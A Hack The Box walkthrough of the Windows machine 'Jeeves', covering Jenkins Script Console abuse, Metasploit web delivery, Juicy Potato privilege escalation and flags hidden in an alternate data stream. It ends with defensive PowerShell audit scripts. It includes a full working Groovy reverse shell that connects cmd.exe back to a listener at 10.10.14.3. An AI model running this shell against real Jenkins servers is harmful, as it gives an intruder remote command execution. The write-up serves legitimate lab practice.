# HTB Series - Jeeves

###### tags: `htb` `Jeeves` `windows` `walkthrough`

We start by scanning the target with nmap to find open ports.

![image](https://hackmd.io/_uploads/ByFia9Ys0.png)

Navigating to the HTTP ports, we can enumerate the directories under port 50000 using dirb.

![image](https://hackmd.io/_uploads/Bk5xR5Yi0.png)

We navigate to /askjeeves.

![image](https://hackmd.io/_uploads/HJf4CcFo0.png)

We navigate to Manage Jenkins > Script Console.

![image](https://hackmd.io/_uploads/S18v09YiA.png)

We can use the script console to invoke a reverse shell.

![image](https://hackmd.io/_uploads/rJOZyjYj0.png)

We use this reverse shell, run as a Groovy script in the console:

```groovy
String host = "10.10.14.3";   // address of our listener
int port = 8044;              // port of our listener
String cmd = "cmd.exe";

// Start cmd.exe with stderr merged into stdout, and connect back to the listener
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();

// Relay bytes between the process and the socket until the socket closes or the process exits
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();
```

We set up a listener on port 8044, run the script and receive a shell.

![image](https://hackmd.io/_uploads/Sk1tJiYoA.png)

We note that the impersonation privilege is enabled.

![image](https://hackmd.io/_uploads/BkLCyjKsR.png)

We can use msf to create a web delivery script and configure it with the options shown below.

![image](https://hackmd.io/_uploads/Bk4K3mBhR.png)

We then run the exploit and execute the resulting script in the shell we have.

![image](https://hackmd.io/_uploads/BJPaxp83C.png)

We run the exploit suggester to see possible ways to escalate.

![image](https://hackmd.io/_uploads/S1vp-pI2C.png)

![image](https://hackmd.io/_uploads/SkQGOwD20.png)

We are aiming for some potato-attack practice on this one, hence the following approach: we opt for exploit/windows/local/ms16_075_reflection_juicy and configure it as shown below.

![image](https://hackmd.io/_uploads/SyUH2wvnR.png)

Running the exploit gives us an elevated session.

![image](https://hackmd.io/_uploads/r1U_nDvn0.png)

We then get a privileged shell.

![image](https://hackmd.io/_uploads/BJSVavPnA.png)

I was aiming for token impersonation, but this particular exploit ended up not having a system token I could impersonate, though it did pop a shell as System so that wasn't required anymore.

We navigate to the users directory for the user flag.

![image](https://hackmd.io/_uploads/BkzmkuDhC.png)

We navigate to the Admin's directory for the root flag.

![image](https://hackmd.io/_uploads/SJIClOP3C.png)

The file says we should look deeper, so we use the `/R` switch of `dir` to look deeper.

![image](https://hackmd.io/_uploads/H1d7-uv2A.png)

It appears to be hidden in an alternate data stream. To uncover it we can use techniques from this [Malwarebytes post](https://www.malwarebytes.com/blog/101/2015/07/introduction-to-alternate-data-streams), or we can use this workaround with `more`.

![image](https://hackmd.io/_uploads/SJ-B-uPnR.png)
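The `dir /R` and `more` steps above find one stream on one file by hand. As an added example (not part of the original walkthrough), the PowerShell below does the same job for a whole directory tree: it lists every NTFS stream on every file, drops the default `:$DATA` stream, and prints the contents of whatever alternate streams remain. The root path is an assumption; point it at the directory you are reviewing.

```powershell
# Added example, not from the original walkthrough.
# Enumerate alternate data streams under a directory tree and dump the non-default ones.
# $Root is an assumed path; adjust it to the directory being reviewed.
$Root = "C:\Users\Administrator\Desktop"

function Get-HiddenStreams {
    param([Parameter(Mandatory)][string]$Path)

    # Get-Item -Stream * returns one object per NTFS stream on a file, including the
    # default ':$DATA' stream. Filtering that out leaves only alternate data streams.
    Get-ChildItem -Path $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' }
        }
}

$streams = Get-HiddenStreams -Path $Root
if (-not $streams) {
    Write-Host "No alternate data streams found under $Root"
    return
}

foreach ($s in $streams) {
    # FileName is the host file, Stream is the ADS name, Length is the stream size in bytes
    Write-Host ("{0}:{1}  ({2} bytes)" -f $s.FileName, $s.Stream, $s.Length)
    # Read the stream content, equivalent to 'more < file:stream' in cmd.exe
    Get-Content -LiteralPath $s.FileName -Stream $s.Stream
}
```

`-Force` is needed so hidden and system files are included in the walk; without it a stream attached to a hidden file would be missed. The same enumeration is useful outside CTFs, since data staged in an alternate stream does not show up in a normal `dir` listing or in the file's reported size.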
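The step earlier in the walkthrough where we note that the impersonation privilege is enabled is the condition the Juicy Potato module depends on. As an added example (not part of the original walkthrough), the PowerShell below turns that manual `whoami /priv` check into a repeatable audit: it parses the CSV form of `whoami /priv` and reports whether the current account holds either of the two token privileges that matter here. The list of privileges and the risk wording are my choices, not something from the page.

```powershell
# Added example, not from the original walkthrough.
# Parse 'whoami /priv' and flag the token privileges that allow impersonation-based
# escalation. Run it in the context of the account being audited (for example the
# service account Jenkins runs under).
$HighRiskPrivileges = @(
    'SeImpersonatePrivilege',
    'SeAssignPrimaryTokenPrivilege'
)

function Get-TokenPrivileges {
    # 'whoami /priv /fo csv' emits a header row followed by one row per privilege:
    # "Privilege Name","Description","State"
    whoami /priv /fo csv | ConvertFrom-Csv
}

function Test-ImpersonationRisk {
    param([object[]]$Privileges = (Get-TokenPrivileges))

    $hits = $Privileges | Where-Object {
        $HighRiskPrivileges -contains $_.'Privilege Name'
    }

    foreach ($p in $hits) {
        # State is 'Enabled' or 'Disabled'. A disabled privilege is still present in the
        # token and can be enabled by the process, so both states are reported.
        [pscustomobject]@{
            Privilege = $p.'Privilege Name'
            State     = $p.State
            Finding   = 'Impersonation privilege held; service account can be escalated to SYSTEM if code execution is obtained'
        }
    }
}

Test-ImpersonationRisk | Format-Table -AutoSize
```

If the Jenkins service account shows up with either privilege, the fix on the defender's side is to run Jenkins under an account that does not hold them and to restrict script console access to Jenkins administrators, since on this box the console is what turned an unauthenticated web visit into code execution as that account.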